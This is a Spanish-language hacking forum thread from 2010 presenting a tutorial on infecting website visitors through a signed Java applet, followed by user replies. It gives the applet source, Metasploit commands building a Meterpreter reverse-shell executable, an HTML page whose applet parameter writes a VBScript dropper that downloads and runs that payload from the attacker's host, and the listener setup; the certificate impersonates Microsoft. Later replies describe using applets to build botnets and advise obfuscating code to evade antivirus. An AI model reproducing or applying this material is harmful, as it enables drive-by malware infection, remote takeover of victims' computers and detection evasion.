Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: Shell Root en 19 Enero 2010, 02:48 am



Título: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 19 Enero 2010, 02:48 am
[Metasploit] Java Applet Infection

(http://www.tequilavalley.com/wp-content/uploads/2009/06/java.png)
[Metasploit By: trashhgoo & Shell Root]



Está infeccion permite la ejecución de codigo remoto, por medio del navegador. Para lograr nuestro objetivo, necesitamos tener instalado dentro de nuestro P.C, algunos componentes necesarios para la compilación y ejecución de alguns archivos.

Primero instalaremos el JDK de JAVA para la compilacion del codigo en JAVA para la ejecución del codigo remoto.
Código:
shellroot@ShellRoot-desktop:~$ sudo apt-get install sun-java6-jdk 

Tambien es necesario la instalacion del Apache2
Código:
shellroot@ShellRoot-desktop:~$ sudo apt-get install apache2

Ahora para que nos quede organizado y no, se nos pierdan archivos, crearemos una carpeta dentro de la carpeta personal. (/home/shellroot/)
Código:
shellroot@ShellRoot-desktop:~$ mkdir JavaAppletInfect

Nos movemos a la carpeta que acabamos de crear y bajamos el siguiente archivo http://spl0it.org/files/makeapplet.sh, no sin antes guardar el siguiente codigo como MSFcmd.java
Código
  1. import java.applet.*;
  2. import java.awt.*;
  3. import java.io.*;
  4.  
  5. public class MSFcmd extends Applet {
  6.   public void init() {
  7.      Process f;
  8.      String first = getParameter("first");
  9.  
  10.      Try {
  11.         f = Runtime.getRuntime().exec("first");
  12.      }Catch(IOException e) {
  13.         e.printStackTrace();
  14.      }
  15.      Process s;
  16.   }
  17. }

Ahora estamos listos para descargar y ejecutar el archivo makeapplet.sh. Así:
Código:
shellroot@shellroot-desktop:~/JavaAppletInfect$ wget http://spl0it.org/files/makeapplet.sh && chmod a+x ./makeapplet.sh
--2010-01-18 20:07:25--  http://spl0it.org/files/makeapplet.sh
Resolviendo spl0it.org... 205.138.55.249
Conectando a spl0it.org|205.138.55.249|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2184 (2,1K) [application/x-sh]
Guardando: «makeapplet.sh»

100%[======================================>] 2.184       --.-K/s   en 0,02s  

2010-01-18 20:07:26 (99,9 KB/s) - `makeapplet.sh' guardado [2184/2184]

shellroot@shellroot-desktop:~/JavaAppletInfect$ ./makeapplet.sh

Despues de ello, nos perdia una información para configurar nuestro certificado. Llenamos la informacion como queramos y al finalizar correctamente, se crearán los certificados del Script.
Código:
Enter the name of the applet without the extension:
MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
¿Cuáles son su nombre y su apellido?
  [Unknown]:  MSFcmd
¿Cuál es el nombre de su unidad de organización?
  [Unknown]:  Microsoft
¿Cuál es el nombre de su organización?
  [Unknown]:  Microsoft Organization
¿Cuál es el nombre de su ciudad o localidad?
  [Unknown]:  Medellin
¿Cuál es el nombre de su estado o provincia?
  [Unknown]:  Colombia
¿Cuál es el código de país de dos letras de la unidad?
  [Unknown]:  CO
¿Es correcto CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Medellin, ST=Colombia, C=CO?
  [no]:  si

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificado almacenado en el archivo <mycertificate.cer>
[+] Done


Deploy the JAR and certificate files. They should be deployed to a distribution directory on a Web server.

<applet width='1' height='1' code=MSFcmd.class archive=SignedMSFcmd.jar> </applet>

shellroot@shellroot-desktop:~

Ahora tenemos que copiar los archivos SignedMSFcmd.Jar y MSFcmd.Class dentro de la carpeta /var/www, despues de ello, iniciamos el Serividor Apache. Así:
Código:
shellroot@shellroot-desktop:~/JavaAppletInfect$ sudo cp SignedMSFcmd.jar /var/www
shellroot@shellroot-desktop:~/JavaAppletInfect$ sudo cp MSFcmd.class /var/wwwshellroot@shellroot-desktop:~/JavaAppletInfect$ aparche2ctl start
No command 'aparche2ctl' found, did you mean:
 Command 'apache2ctl' from package 'apache2.2-common' (main)
aparche2ctl: command not found
shellroot@shellroot-desktop:~/JavaAppletInfect$ apache2ctl start
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
(13)Permission denied: make_sock: could not bind to address [::]:80
(13)Permission denied: make_sock: could not bind to address 0.0.0.0:80
no listening sockets available, shutting down
Unable to open logs
shellroot@shellroot-desktop:~/JavaAppletInfect$

Despues de realizar todo lo anterior, precedemos a realizar un ejecutable con un PAYLOAD en este caso usaré windows/meterpreter/reverse_tcp
Código:
shellroot@shellroot-desktop:~$ cd msf3
shellroot@shellroot-desktop:~/msf3$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.142.136 LPORT=1234 R | ./msfencode -t exe -o MSFcmd.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

shellroot@shellroot-desktop:~/msf3$

Movemos el ejecutable dentro de la carpeta /var/www y configuramos los permisos del archivo.
Código:
shellroot@shellroot-desktop:~/msf3$ sudo cp ./MSFcmd.exe /var/www/
shellroot@shellroot-desktop:~/msf3$ sudo chmod a+x /var/www/MSFcmd.exe
shellroot@shellroot-desktop:~/msf3$

Ahora el archivo (index.html) que se encuentra dentro de la carpeta /var/www, modificamos el contenido y le añadimos el Script Malicioso. Así:
Código
  1. <html>
  2. <head><title></title></head>
  3. <body>
  4.   <applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>
  5.  
  6.   <param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\MSFcmd.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://192.168.142.136/MSFcmd.exe C:\windows\MSFcmd.exe'> </applet>
  7. </body>
  8. </html>

Ahora ingresamos a la Consola del Metasploit, y usamos el Auxiliar multi/handler, ingresamos los datos del PAYLOAD anterior con los mismo datos, y ejecutamos el exploit en segundo plano. Así:
Código:
shellroot@shellroot-desktop:~/msf3$ ./msfconsole

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf exploit(handler) > back
msf > use multi/handler
reverse_tcpmsf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.142.136
LHOST => 192.168.142.136
msf exploit(handler) > set LPORT 1234
LPORT => 1234
msf exploit(handler) > save
Saved configuration to: /home/shellroot/.msf3/config
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler...

y esperamos a que alguien ingrese a la URL, para recibir la Session del Meterpreter.

PD: La victima al ejecutar se le mostratá el siguiente certificado Web. :D
(http://img682.imageshack.us/img682/4756/jeqrozg7.png) (http://img682.imageshack.us/i/jeqrozg7.png/)

Gr3tz: Rcart, Messerschmitt, Xzite





Mirando los tipos de infecciones que se pueden realizar para Inyectar un PAYLOAD, encontré un Papper de AnalyseR, publicado por Hacker_Zero, Mirad. (http://foro.elhacker.net/hacking_avanzado/poc_infeccion_mediante_java_applet_y_vbscript-t240306.0.html). Pero mirando el MSFUnleashed, me di cuenta que era el mismo tipo de infección, Mirad (http://www.offensive-security.com/metasploit-unleashed/Java-Applet-Infection-Method) así que no se quien es... :·P, igual no me importa... x·D


Título: Re: [Metasploit] Java Applet Infection
Publicado por: pUzzLe en 21 Enero 2010, 16:10 pm
En este caso la "victima" se conectaría a nosotros, si no me equivoco.

Gracias por el tuto, otro más para imprimir  :laugh:

Saludos.


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Debci en 21 Enero 2010, 18:06 pm
Señores, no es un espejismo, no e sun pájaro, es shell root con la manera mas increible que he visto de conseguir una shell...
Madre mia esto vale oro....

Saludos


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 21 Enero 2010, 18:24 pm
Señores, no es un espejismo, no e sun pájaro, es shell root con la manera mas increible que he visto de conseguir una shell...
Madre mia esto vale oro...
jejeje

Joder, esto me tomo más de 1 Semana en ponerlo en practica!

Proximamente: Fast-Track And SET (Social Engineering Toolkit)


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Debci en 21 Enero 2010, 21:37 pm
Señores, no es un espejismo, no e sun pájaro, es shell root con la manera mas increible que he visto de conseguir una shell...
Madre mia esto vale oro...
jejeje

Joder, esto me tomo más de 1 Semana en ponerlo en practica!

Proximamente: Fast-Track And SET (Social Engineering Toolkit)
Eso es lo que me comentaste, pero un toolkit de ingenieria social? No me lo imagino simplemente, que trae coletillas para engañar? paginas para hacer phishing?

Saludos


Título: Re: [Metasploit] Java Applet Infection
Publicado por: S1dD3xt35 en 21 Enero 2010, 23:51 pm
son geniales tus post  :-( de lo mejor ahora a practicar gracias :D ;-)


Título: Re: [Metasploit] Java Applet Infection
Publicado por: alexkof158 en 30 Enero 2010, 01:30 am
esto se podria hacer en wan? osea tendria que abrir puertos y configurar un servidor apache en mi pc?? 
Saludos


Título: Re: [Metasploit] Java Applet Infection
Publicado por: [L]ord [R]NA en 30 Enero 2010, 02:43 am
esto se podria hacer en wan? osea tendria que abrir puertos y configurar un servidor apache en mi pc?? 
Saludos

No veo porque no sea posible.


Título: Re: [Metasploit] Java Applet Infection
Publicado por: EgoPL en 30 Enero 2010, 23:38 pm
Muy bueno que hayan portado este método a metasploit, yo hace años usaba applets para conseguir bots.
Ponía algo interesante como juegos, reproductores de música etc y la gente al meterse y aceptar los permisos además de jugar al juego estaban descargando el bot, ejecutándolo y pasando a formar parte de la botnet.


Título: Re: [Metasploit] Java Applet Infection
Publicado por: alexkof158 en 31 Enero 2010, 01:36 am
esto se podria hacer en wan? osea tendria que abrir puertos y configurar un servidor apache en mi pc?? 
Saludos

No veo porque no sea posible.
lo digo porke este metodo es un pocoo viejo, y el firefox o ie 7 u 8 no lo dejan ejecutarse o si?


Título: Re: [Metasploit] Java Applet Infection
Publicado por: tragantras en 1 Febrero 2010, 15:50 pm
muy buen post Shell Root. Por qué no te anímas y haces una recolección de todos tus posts abiertos? Estaría muy interesante a la larga contar con todos ellos reunidos ^^

Un saludo!


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Asphyxia en 1 Febrero 2010, 17:05 pm
Una E-zine


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 1 Febrero 2010, 17:34 pm
muy buen post Shell Root. Por qué no te anímas y haces una recolección de todos tus posts abiertos? Estaría muy interesante a la larga contar con todos ellos reunidos ^^
El usuario ..::| D3Bć1 |::. lo está haciendo!. Bueno eso creo...  :silbar:


Título: Re: [Metasploit] Java Applet Infection
Publicado por: tragantras en 2 Febrero 2010, 11:31 am
Vale reescribo xD:

El codigo java que has puesto está mal en varias cosas.. ( ya que copias, copia bien campeón xDD )

para empezar, no es "Try" sino try, tampoco "Catch" sino "catch", es decir, esas dos palabras en minúsculas. Por otra parte:
Código:
f = Runtime.getRuntime().exec("first");

está mal, es:

Código:
f = Runtime.getRuntime().exec(first);

es decir, sin las comillas, lo demás perfecto, un saludo! xD

pongo aquí el codigo entero bien... ( de todas maners en los otros posts si están bien escritos )


Código:
import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String first = getParameter(first);
try {
f = Runtime.getRuntime().exec(first);
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}







Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 2 Febrero 2010, 17:29 pm
 :-\


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Debci en 5 Febrero 2010, 20:46 pm
muy buen post Shell Root. Por qué no te anímas y haces una recolección de todos tus posts abiertos? Estaría muy interesante a la larga contar con todos ellos reunidos ^^
El usuario ..::| D3Bć1 |::. lo está haciendo!. Bueno eso creo...  :silbar:
asi es, una cosa el lhost que indica?

Saludos


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 5 Febrero 2010, 20:54 pm
una cosa el lhost que indica?
Depende del PAYLOAD seleccionado (Directo o Inverso), debes de seleccionar a que IP regresará. En otras palabras más simples...
RHOST = Host Remoto
LHOST = Host Local


Título: Re: [Metasploit] Java Applet Infection
Publicado por: alexkof158 en 10 Febrero 2010, 12:07 pm
este metodo se puede llevar bajar windows xp????


Título: Re: [Metasploit] Java Applet Infection
Publicado por: illera88 en 10 Febrero 2010, 14:02 pm
Todo perfecto hasta este paso:
Citar
root@ubuntu:/home/berto/Escritorio/JavaAppletInfect# ./makeapplet.sh
Enter the name of the applet without the extension:
MSFcmd
MSFcmd.java:10: not a statement
      Try {
      ^
MSFcmd.java:10: ';' expected
      Try {
         ^
MSFcmd.java:12: ')' expected
      }Catch(IOException e) {
                        ^
MSFcmd.java:12: illegal start of expression
      }Catch(IOException e) {
                          ^
MSFcmd.java:12: ';' expected
      }Catch(IOException e) {
                           ^
MSFcmd.java:17: class, interface, or enum expected
}
^
6 errors
Error with javac
root@ubuntu:/home/berto/Escritorio/JavaAppletInfect#

Esto por que es???
Un saludo y gracias ;);)


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 10 Febrero 2010, 18:45 pm
este metodo se puede llevar bajar windows xp????
Por su pollo, instala el JDK de java.



Esto por que es???
WTF!, donde demonios estás... xD, en que paso estás y que estás haciendo?


Título: Re: [Metasploit] Java Applet Infection
Publicado por: illera88 en 10 Febrero 2010, 20:40 pm
este metodo se puede llevar bajar windows xp????
Por su pollo, instala el JDK de java.



Esto por que es???
WTF!, donde demonios estás... xD, en que paso estás y que estás haciendo?

cuando ejecuto :
Citar
./makeapplet.sh

Gracias shell root!!!


Título: Re: [Metasploit] Java Applet Infection
Publicado por: alexkof158 en 11 Febrero 2010, 02:06 am
Problema para crear el certificado .jar  :P

en windows como seria??
shellroot@shellroot-desktop:~/JavaAppletInfect$ ./makeapplet.sh
 
Para Guindows ;D
Código:
C:\Documents and Settings\Administrador\Escritorio\JavaInfect> java makeapplet.s
h
Exception in thread "main" java.lang.NoClassDefFoundError: makeapplet/sh
Caused by: java.lang.ClassNotFoundException: makeapplet.sh
        at java.net.URLClassLoader$1.run(Unknown Source)
        at java.security.AccessController.doPrivileged(Native Method)
        at java.net.URLClassLoader.findClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
        at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
Could not find the main class: makeapplet.sh.  Program will exit.

C:\Documents and Settings\Administrador\Escritorio\JavaInfect>

Saludos,



Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 11 Febrero 2010, 02:18 am
alexkof158, jajaja pasate a linux  :rolleyes:


Título: Re: [Metasploit] Java Applet Infection
Publicado por: alexkof158 en 11 Febrero 2010, 02:23 am
será tocara, es que linux apenas estoy dandole y alli vamos x buen camino saludos naaaaaaaaaaaaaaaaaaaaaaaaa Shell Root conectate al msn


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 11 Febrero 2010, 02:40 am
Cuando no estoy en el MSN es porque ando ocupado, así que no puedo conectarme.

Momento estas ejecutando makeapplet.sh, si mal no recuerdo los .sh son extensiones para linux... Esperemos a que alguien confirme. Ahora, creo que si te vas al shell del MSF, ojo, no el msfconsole, sino la shell.bat. Mira si se puede ejecutar desde allí!

Saludos!


Título: Re: [Metasploit] Java Applet Infection
Publicado por: 0xb4dc0d31 en 11 Febrero 2010, 03:14 am
Cabe aclarar que este método es bastante viejo, aún así, en mi experiencia suelen desconfiar más de un Applet que de un ejecutable a secas... Pero bueno, en los tiempos de ahora si no aplicas "IS" no hay víctimas.

Los ficheros .sh son los scripts de la terminal (bash) de Linux, el equivalente al BATCH de Windows.


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 11 Febrero 2010, 03:41 am
Cabe aclarar que este método es basntante viejo, aún así, en mi experiencia suelen desconfiar más de un Applet que de un ejecutable a secas... Pero bueno,...
:¬¬



..., en los tiempos de ahora si no aplicas "IS" no hay víctimas.
WTF!



Los ficheros .sh son los scripts de la terminal (bash) de Linux, el equivalente al BATCH de Windows.
Exacto, equivalente a .bat en windows  :¬¬


Título: Re: [Metasploit] Java Applet Infection
Publicado por: 0xb4dc0d31 en 11 Febrero 2010, 03:47 am
Cabe aclarar que este método es basntante viejo, aún así, en mi experiencia suelen desconfiar más de un Applet que de un ejecutable a secas... Pero bueno,...
:¬¬



..., en los tiempos de ahora si no aplicas "IS" no hay víctimas.
WTF!



Los ficheros .sh son los scripts de la terminal (bash) de Linux, el equivalente al BATCH de Windows.
Exacto, equivalente a .bat en windows  :¬¬

IS = Ing. Social
No hace falta quotearme tantas veces por lo que ya está claro, ¿verdad?, o es el afan de incrementar tu número de posts.

[sarcasmo]Ah, debí incluir negritas y color remarcando "en mi experiencia"[/sarcasmo]

Citar
Exacto, equivalente a .bat en windows  :¬¬
¿Equivalentes o iguales?


Título: Re: [Metasploit] Java Applet Infection
Publicado por: rockernault en 11 Febrero 2010, 04:04 am
identicos... es batch es lenguaje de scripting  y los archivos son los .bat

la IS no es necesaria aqui...  y segun mi experiencia, siempre caen los que no tienen cuidado con lo que hacen...

los exploits no necesitan ingenieria social.. jalan porque jalan...



Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 11 Febrero 2010, 04:48 am
..., o es el afan de incrementar tu número de posts.
Huelo un aire de envidia...  :silbar:




identicos... es batch es lenguaje de scripting  y los archivos son los .bat
Simon!



la IS no es necesaria aqui...  y segun mi experiencia, siempre caen los que no tienen cuidado con lo que hacen...
Más que todo usuarios N00B's



los exploits no necesitan ingenieria social.. jalan porque jalan...
Depende del exploit,  :rolleyes: implementa el ie_aurora a ver que te sale :P



Título: Re: [Metasploit] Java Applet Infection
Publicado por: DragonFire en 11 Febrero 2010, 06:30 am
tragantras

por que le dices campeon, la forma en que usas esa expresion, denota que estas gritandole al foro que eres mejor que el.


Ese metodo era muy bueno en las epocas de Windows 9x, en Windows XP, medio sirve y actualmente no sirve, por que el navegador se ejeutara con permisos minimos lo que realmente no hace una infeccion real y no podria hacerla por que no tiene los privilegios para hacerlo, en ningun vista ni Windows 7 va a funcionar algo mas decente que ver un par de archivos, fuera de eso nunca podra tomar el control del PC salvo algun raro, rarisimo bufferoverflow que le ayude a escalar el privilegio y ese codigo no explota eso


Título: Re: [Metasploit] Java Applet Infection
Publicado por: rockernault en 11 Febrero 2010, 13:34 pm
Citar
Huelo un aire de envidia... 


si.. suele pasar cuando haces las cosas bien...."Si los perros ladran, es que vamos avanzando"

en SMB2 esta el DOS cuando le llegan paquetes  maliciosos al servidor smb2


y no siempre se trata de explotar vulns de SO... esta adobe, VLC, putty, tftp, cuteftp, formatos de windows en IIS del tipo asp;.jpg

Karmetasploit, etc


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Littlehorse en 11 Febrero 2010, 13:48 pm
Citar
y no siempre se trata de explotar vulns de SO... esta adobe, VLC, putty, tftp, cuteftp, formatos de windows en IIS del tipo asp;.jpg

Karmetasploit, etc

Para nada. No se trata solamente de encontrar un punto de acceso si no de ademas encontrar un fallo para poder escalar privilegios. En los últimos sistemas de Microsoft tendrías que vulnerar una aplicacion que este en el nivel de integridad al cual que desees acceder, o en su defecto, vulnerar el control de los niveles de integridad.

En cuanto al método del Applet, es pura y exclusivamente ingenieria social. Por lo menos en su concepto mas general y creo que discutir eso no tiene mucho sentido  ;D. Si a estas alturas del partido desconocemos el significado de ingeniería social, mal vamos  :P.

Un saludo!


Título: Re: [Metasploit] Java Applet Infection
Publicado por: rockernault en 11 Febrero 2010, 14:03 pm
Citar
En los últimos sistemas de Microsoft tendrías que vulnerar una aplicacion que este en el nivel de integridad al cual que desees acceder, o en su defecto, vulnerar el control de los niveles de integridad.

como cual aplicacion?   un servicio??  SMB??  ftp?? webserver??

si, no tiene sentido discutir la IS...


Título: Re: [Metasploit] Java Applet Infection
Publicado por: alexkof158 en 13 Febrero 2010, 09:50 am
una simple pregunta este metodo funciona en los browsers como IE 7 , 8,  and Mozilla 3.5 ????? graciassss

Saludos

 :laugh:


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Shell Root en 13 Febrero 2010, 18:00 pm
Simon!


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Debci en 20 Julio 2010, 17:26 pm
Siento re-abrir post pero sigue funcionando este método? Porque estoy probando como un loco y no funciona :S

Saludos


Título: Re: [Metasploit] Java Applet Infection
Publicado por: [L]ord [R]NA en 20 Julio 2010, 22:00 pm
Verifica las versiones vulnerables a ese error.


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Debci en 21 Julio 2010, 10:07 am
Verifica las versiones vulnerables a ese error.
Si ir va pero todos los AV detectan la pag como maliciosa xD

Saludos


Título: Re: [Metasploit] Java Applet Infection
Publicado por: alexkof158 en 21 Julio 2010, 23:10 pm
Verifica las versiones vulnerables a ese error.
Si ir va pero todos los AV detectan la pag como maliciosa xD

Saludos
trata de cambiar las variables del codigo en Java.


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Debci en 21 Julio 2010, 23:26 pm
Verifica las versiones vulnerables a ese error.
Si ir va pero todos los AV detectan la pag como maliciosa xD

Saludos
trata de cambiar las variables del codigo en Java.
Los identificadores de las variables?
Solo con eso? podria liarlo mas xD ayudaria si lo meto en paquetes clases y mas hostias?

Saludos


Título: Re: [Metasploit] Java Applet Infection
Publicado por: [L]ord [R]NA en 22 Julio 2010, 01:50 am
Verifica las versiones vulnerables a ese error.
Si ir va pero todos los AV detectan la pag como maliciosa xD

Saludos

Ofusca el codigo, osea, trata de hacer un codigo que realize lo mismo pero de una forma diferente, posiblemente funcione.


Título: Re: [Metasploit] Java Applet Infection
Publicado por: alexkof158 en 22 Julio 2010, 05:59 am
Verifica las versiones vulnerables a ese error.
Si ir va pero todos los AV detectan la pag como maliciosa xD

Saludos

Ofusca el codigo, osea, trata de hacer un codigo que realize lo mismo pero de una forma diferente, posiblemente funcione.

sapto


Título: Re: [Metasploit] Java Applet Infection
Publicado por: Debci en 22 Julio 2010, 12:52 pm
Verifica las versiones vulnerables a ese error.
Si ir va pero todos los AV detectan la pag como maliciosa xD

Saludos

Ofusca el codigo, osea, trata de hacer un codigo que realize lo mismo pero de una forma diferente, posiblemente funcione.
Bastaria con cambiar nombres a funciones y clases y dividirlo mas?

Saludos


Título: Re: [Metasploit] Java Applet Infection
Publicado por: [L]ord [R]NA en 22 Julio 2010, 21:46 pm
Verifica las versiones vulnerables a ese error.
Si ir va pero todos los AV detectan la pag como maliciosa xD

Saludos

Ofusca el codigo, osea, trata de hacer un codigo que realize lo mismo pero de una forma diferente, posiblemente funcione.
Bastaria con cambiar nombres a funciones y clases y dividirlo mas?

Saludos
cambia los nombres de las variables, cambia el orden de las funciones, agrega codigo basura, etc.